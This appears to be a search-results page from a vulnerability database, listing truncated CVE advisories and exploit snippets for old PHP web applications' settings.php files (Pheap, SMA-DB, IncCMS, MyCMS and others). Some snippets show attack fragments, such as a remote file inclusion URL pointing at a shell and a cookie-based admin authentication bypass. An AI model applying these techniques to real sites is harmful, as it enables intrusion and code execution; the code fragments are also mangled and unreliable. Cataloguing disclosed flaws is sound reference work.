190 matches found
MyCMS 0.9.8 - Remote Command Execution (1)
MyCMS 0.9.8 - Remote Command Execution 1 !/usr/bin/php -q -d shortopentag=on Thanks to rgod for the php code and Marty for the Love "; if $argc 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i; $cont++;...
Authentication flaw
Pheap 2.0 allows remote attackers to bypass authentication by setting a pheaplogin cookie value to the administrator's username, which can be used to 1 obtain sensitive information, including the administrator password, via settings.php or 2 upload and execute arbitrary PHP code via an updatedoc...
CVE-2007-2985
Pheap 2.0 allows remote attackers to bypass authentication by setting a pheaplogin cookie value to the administrator's username, which can be used to 1 obtain sensitive information, including the administrator password, via settings.php or 2 upload and execute arbitrary PHP code via an updatedoc...
CVE-2007-2985
CVE-2007-2985 affects Pheap 2.0. An attacker can bypass authentication by setting the pheap_login cookie to the administrator’s username, enabling (1) access to sensitive info, including the admin password via settings.php and (2) upload/execute arbitrary PHP code via the update_doc action in edi...
Input validation
PHPChain 1.0 and earlier allows remote attackers to obtain the installation path via invalid values of the catid parameter to 1 settings.php or 2 cat.php, as demonstrated by XSS manipulations...
MyBlog 0.9.8 - 'Settings.php' Authentication Bypass
source: https://www.securityfocus.com/bid/23521/info MyBlog is prone to an authentication-bypass vulnerability. Attackers can exploit this issue to bypass the authentication mechanism and then access or overwrite files with arbitrary PHP script code. Script code added to certain files are later...
CVE-2007-1635
Static code injection vulnerability in admin/settings.php in Net Portal Dynamic System NPDS 5.10 and earlier allows remote authenticated users to inject arbitrary PHP code via the xtop parameter in a "ConfigSave" op to admin.php, which can later be accessed via a "Configure" op to admin.php...
SMA-DB <= 0.3.9 (settings.php) Remote File Inclusion Vulnerability
To ConTacT mE:wWw.Asb-May.net/bb ScRiPt:-http://people.ee.ethz.ch/dmaeder/bluevirus/downloader.php?filename=U01BLURC&referrer=hots Discovered By:- ThE dE@Th AsB-MaY DiScOvEr ExPlIoTs Gr0uP Settings.php:- includeonce$pfadz."scripts/session.php";...
smadb-rfi.txt
To ConTacT mE:wWw.Asb-May.net/bb ScRiPt:-http://people.ee.ethz.ch/dmaeder/bluevirus/downloader.php?filename=U01BLURC&referrer=hots Discovered By:- ThE dE@Th Settings.php:- includeonce$pfadz."scripts/session.php"; ExPlOiT:-http://www.Site.com/theme/settings.php?pfadz=Shell...
SMA-DB 0.3.9 - 'settings.php' Remote File Inclusion
To ConTacT mE:wWw.Asb-May.net/bb ScRiPt:-http://people.ee.ethz.ch/dmaeder/bluevirus/downloader.php?filename=U01BLURC&referrer=hots Discovered By:- ThE dE@Th Settings.php:- includeonce$pfadz."scripts/session.php"; ExPlOiT:-http://www.Site.com/theme/settings.php?pfadz=Shell milw0rm.com 2007-02-05...
SMA-DB <= 0.3.9 (settings.php) Remote File Inclusion Vulnerability
No description provided by source. To ConTacT mE:wWw.Asb-May.net/bb ScRiPt:-http://people.ee.ethz.ch/dmaeder/bluevirus/downloader.php?filename=U01BLURC&referrer=hots Discovered By:- ThE dE@Th AsB-MaY DiScOvEr ExPlIoTs Gr0uP Settings.php:- includeonce$pfadz."scripts/session.php";...
SMA-DB 0.3.9 - settings.php Remote File Inclusion
SMA-DB 0.3.9 - settings.php Remote File Inclusion To ConTacT mE:wWw.Asb-May.net/bb ScRiPt:-http://people.ee.ethz.ch/dmaeder/bluevirus/downloader.php?filename=U01BLURC&referrer=hots Discovered By:- ThE dE@Th Settings.php:- includeonce$pfadz."scripts/session.php";...
IncCMS Core <= 1.0.0 (settings.php) Remote File Include Vulnerability
::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: :::: :::: :+: :+: :+: :+: +:+:+: :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+:+ +:+ ++ +++:++ +++:++++: ++ +:+ ++ ++ ++ +...
IncCMS Core 1.0.0 - settings.php Remote File Inclusion
IncCMS Core 1.0.0 - settings.php Remote File Inclusion ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: :::: :::: :+: :+: :+: :+: +:+:+: :+:+:+ +:+ +:+ +:+...
IncCMS Core <= 1.0.0 (settings.php) Remote File Include Vulnerability
Exploit for unknown platform in category web applications ===================================================================== IncCMS Core = 1.0.0 settings.php Remote File Include Vulnerability ===================================================================== ::::::::: :::::::::: ::: :::...
IncCMS Core <= 1.0.0 (settings.php) Remote File Include Vulnerability
No description provided by source. ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: :::: :::: :+: :+: :+: :+: +:+:+: :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+:+ +:+ ++...
IncCMS Core 1.0.0 - 'settings.php' Remote File Inclusion
::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: :::: :::: :+: :+: :+: :+: +:+:+: :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+:+ +:+ ++ +++:++ +++:++++: ++ +:+ ++ ++ ++ +...
CVE-2006-4621
PHP remote file inclusion vulnerability in settings.php in Pheap 1.2, and possibly earlier, allows remote attackers to execute arbitrary PHP code via a URL in the lpref parameter. NOTE: the provenance of this information is unknown; the details are obtained from third party information. The...
Design/Logic Flaw
PlaNet Concept plaNetStat 20050127 allows remote attackers to gain administrative privileges, and view and configure log files, via a direct request to the 1 admin.php or 2 settings.php page...
CVE-2006-0940
Multiple direct static code injection vulnerabilities in savesettings.php in ShoutLIVE 1.1.0 allow remote attackers to execute arbitrary PHP code via variables that are written to settings.php...